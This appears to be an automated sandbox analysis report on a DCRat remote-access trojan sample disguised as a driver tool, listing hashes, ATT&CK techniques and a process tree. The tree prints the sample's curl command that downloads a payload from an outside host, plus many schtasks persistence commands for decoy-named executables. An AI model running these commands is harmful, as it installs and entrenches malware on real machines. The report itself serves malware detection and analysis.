dcrat | b4378b93df9c53cfb65f83695e4a68c3eceb87c49eef02ee45b85128f967e381

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-11-2024 12:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pwxz driver + km.exe
Size

1.1MB
MD5

f98e6472238ac5d8686545a0d48d176b
SHA1

927fa5aff827297e7bbc991b6bc573f4cf6d9945
SHA256

b4378b93df9c53cfb65f83695e4a68c3eceb87c49eef02ee45b85128f967e381
SHA512

231b45a7c636a5d8dc6a805d7a9da61308f159540b74796e8a11329fe90ed0f72ad88e5104781156f1ff36403b1bb131e83030fef2e37cf9c139d32194d5817e
SSDEEP

24576:jfANwLwUvInQgVXu9QdasS+9zxocWbnw0GcV73Fd:jfYwSnZAQdasS+Ecod

Score

10^/10

dcrat discovery infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4660	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2868	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2184	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3996	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5044	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3280	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4056	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2732	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4348	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4708	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	752	2440	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	2440	schtasks.exe	95

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	comBrowserfontCommon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	pwxz driver + km.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	physmeme.exe

Executes dropped EXE 3 IoCs

pid	Process
2124	physmeme.exe
1500	comBrowserfontCommon.exe
32	dllhost.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Speech\physmeme.exe	curl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	physmeme.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	comBrowserfontCommon.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3180	schtasks.exe
232	schtasks.exe
5044	schtasks.exe
4056	schtasks.exe
2732	schtasks.exe
964	schtasks.exe
2184	schtasks.exe
752	schtasks.exe
4660	schtasks.exe
2112	schtasks.exe
3280	schtasks.exe
4708	schtasks.exe
1108	schtasks.exe
2868	schtasks.exe
1120	schtasks.exe
4304	schtasks.exe
4348	schtasks.exe
3996	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
1500	comBrowserfontCommon.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe
32	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
32	dllhost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1500	comBrowserfontCommon.exe
Token: SeDebugPrivilege	32	dllhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4844	pwxz driver + km.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 4844 wrote to memory of 1936	4844	pwxz driver + km.exe	84
PID 4844 wrote to memory of 1936	4844	pwxz driver + km.exe	84
PID 1936 wrote to memory of 2728	1936	cmd.exe	85
PID 1936 wrote to memory of 2728	1936	cmd.exe	85
PID 4844 wrote to memory of 2124	4844	pwxz driver + km.exe	89
PID 4844 wrote to memory of 2124	4844	pwxz driver + km.exe	89
PID 4844 wrote to memory of 2124	4844	pwxz driver + km.exe	89
PID 2124 wrote to memory of 2528	2124	physmeme.exe	91
PID 2124 wrote to memory of 2528	2124	physmeme.exe	91
PID 2124 wrote to memory of 2528	2124	physmeme.exe	91
PID 2528 wrote to memory of 664	2528	WScript.exe	103
PID 2528 wrote to memory of 664	2528	WScript.exe	103
PID 2528 wrote to memory of 664	2528	WScript.exe	103
PID 664 wrote to memory of 1500	664	cmd.exe	105
PID 664 wrote to memory of 1500	664	cmd.exe	105
PID 1500 wrote to memory of 3104	1500	comBrowserfontCommon.exe	124
PID 1500 wrote to memory of 3104	1500	comBrowserfontCommon.exe	124
PID 3104 wrote to memory of 436	3104	cmd.exe	126
PID 3104 wrote to memory of 436	3104	cmd.exe	126
PID 3104 wrote to memory of 4940	3104	cmd.exe	127
PID 3104 wrote to memory of 4940	3104	cmd.exe	127
PID 3104 wrote to memory of 32	3104	cmd.exe	129
PID 3104 wrote to memory of 32	3104	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\pwxz driver + km.exe
"C:\Users\Admin\AppData\Local\Temp\pwxz driver + km.exe"
1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:2728
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ChainSurrogateServersessionCrt\AjINMi8J6kx3pWrbYYHviGjQ7go1FcYdMdMi4IhRz46EcvjyaTF.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ChainSurrogateServersessionCrt\eTau3XGYlc3.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:664
    - - C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe
        
        "C:\ChainSurrogateServersessionCrt/comBrowserfontCommon.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1500
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LvznYZfujE.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3104
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:436
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4940
        
        C:\Users\Public\Pictures\dllhost.exe
        
        "C:\Users\Public\Pictures\dllhost.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:32

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Pictures\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Start Menu\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\Start Menu\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Start Menu\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Favorites\Links\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Admin\Favorites\Links\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Favorites\Links\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comBrowserfontCommonc" /sc MINUTE /mo 11 /tr "'C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comBrowserfontCommon" /sc ONLOGON /tr "'C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comBrowserfontCommonc" /sc MINUTE /mo 12 /tr "'C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ChainSurrogateServersessionCrt\AjINMi8J6kx3pWrbYYHviGjQ7go1FcYdMdMi4IhRz46EcvjyaTF.vbe

Filesize
220B

MD5
b0c078a91915fb69bea2a9aeccf8a7cb

SHA1
ecfd8f5b2a04e2e430cbb39e6ced49e620f8907f

SHA256
2d5d92c0be94fbce3cb8615d321e964cafc0deae0f1d8d7c9ca5ec568f85151f

SHA512
9a624163dc575bbdf4a7b9ac223f6f57c388b266f7c5b0919dc339086098a89ab7f9973d677bcead9a1bd6f6c9c6da47499fcbb7bfc3f470d37bb576c19a9ee2

Download Submit
C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe

Filesize
1.8MB

MD5
42b8f82f87208f2164578692825b54f4

SHA1
f8487bbef1aa1620c4b48964669075718ef895f6

SHA256
fe58084f904a2b68705124106d0811f336e23ab9e6db9b543de41c5946d716b7

SHA512
aba2d9fd77126e8d16dbe2b717a2682b58177ebca29312cd4b4de9a2ae7d8729af2b2956ba31f1dc108180be91d3a157ed75b76859ab2660de37e801bc09f4d3

Download Submit
C:\ChainSurrogateServersessionCrt\eTau3XGYlc3.bat

Filesize
115B

MD5
79ea866be4d7b731d61f95fb33482ea6

SHA1
4335e155c1f6ceeb0dc02bebbac972c5d8f666f5

SHA256
33466baca4d3f2c64362d48821fb248ed7e4ae32f03f8c458c06c03689fa8b45

SHA512
94f2b4a34e0bb312bc27ac4c1b3c6fd895786c6082346bf7cbb7a6b48b775213a0ce19e271dfa253b458788d05c526a6f0bfe985773319a816341ff8cfed540f

Download Submit
C:\Users\Admin\AppData\Local\Temp\LvznYZfujE.bat

Filesize
212B

MD5
e514ab818c691a08852a8706dacd6c5a

SHA1
d5be73d847c24a11bc4f831e7d97c0cd4d352740

SHA256
708349f4c38d0fa4f8e55f22330df94d79928c44d1c7a5605ed780bc8c6d0c23

SHA512
f2084ae8a0a5b8045fc47d6f8dac65e7832875a72f97ecc298c70374fb756639e31c1bd45f32eb966deff343e5d7ce103856c9b05e5d919c6a8153216ee02e75

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
2.1MB

MD5
eba1a2045ca989e59d2b39805ef52851

SHA1
17c5a2013f7213c152b1d212c2a84dbbc54f6065

SHA256
4cd4231a17dab319314fccec4054b4a1c74c0244fdedbcfbb9e9e2228962f42a

SHA512
1acbed79480772605e8b7fca6d31d602ab4cf4544577609f3e8b7f077ba6a0a1d26568f3a713c94f416a3fa361f9f4e3969445e277ad78da42a6ddddce5f43b1

Download Submit
memory/1500-15-0x0000000000360000-0x0000000000534000-memory.dmp

Filesize
1.8MB

Download
memory/1500-17-0x0000000002820000-0x000000000282E000-memory.dmp

Filesize
56KB

Download
memory/1500-19-0x000000001B060000-0x000000001B07C000-memory.dmp

Filesize
112KB

Download
memory/1500-20-0x000000001B120000-0x000000001B170000-memory.dmp

Filesize
320KB

Download
memory/1500-22-0x000000001B080000-0x000000001B098000-memory.dmp

Filesize
96KB

Download